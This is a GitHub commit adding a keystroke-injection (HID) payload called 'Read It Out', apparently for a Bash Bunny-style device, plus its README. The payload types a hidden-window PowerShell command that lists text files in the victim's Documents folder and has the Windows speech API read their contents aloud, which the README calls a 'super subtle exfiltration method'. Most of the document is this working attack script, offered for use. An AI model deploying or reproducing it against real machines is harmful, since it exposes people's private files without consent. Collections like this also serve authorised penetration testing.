New Payload - Read It Out (#444)

This commit is contained in:
cribb-it 2021-12-21 23:28:38 +00:00 committed by GitHub
parent 5d4367787f
commit 8a7606aa0a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 49 additions and 0 deletions

View File

@ -0,0 +1,22 @@
# Title: Read It Out
# Description: Gets the Microsoft Speech API (SAPI) to read out the content of text files in the MyDocuments directory.
# Author: Cribbit
# Version: 1.0
# Category: Exfiltration
# Target: Windows (Powershell 5.1+)
# Attackmodes: HID
# Extensions: Run
LED SETUP
GET SWITCH_POSITION
ATTACKMODE HID
QUACK DELAY 500
LED ATTACK
RUN WIN "powershell -Noni -NoP -W h -C \"& {\$s=New-Object -ComObject SAPI.SPVoice; gci([Environment]::GetFolderPath('MyDocuments')) -file *.txt | % {\$s.Speak(\$(gc(\$_.FullName)))}}\""
LED FINISH

View File

@ -0,0 +1,27 @@
# Read It Out
- Author: Cribbit
- Version: 1.0
- Target: Windows 10 (Powershell 5.1+)
- Category: Exfiltration
- Attackmode: HID
- Extensions: Run
## Change Log
| Version | Changes |
| ------- | --------------- |
| 1.0 | Initial release |
## Description
Super subtle exfiltration method.
Gets the Microsoft Speech API (SAPI) to read out the content of text files in the MyDocuments directory.
## Config
Add -r to do subdirectorys
## Colours
| Status | Colour | Description |
| ------ | ----------------------------- | --------------------------- |
| SETUP | Magenta solid | Setting attack mode |
| ATTACK | Yellow single blink | Injecting Powershell script |
| FINISH | Green blink followed by SOLID | Script is finished |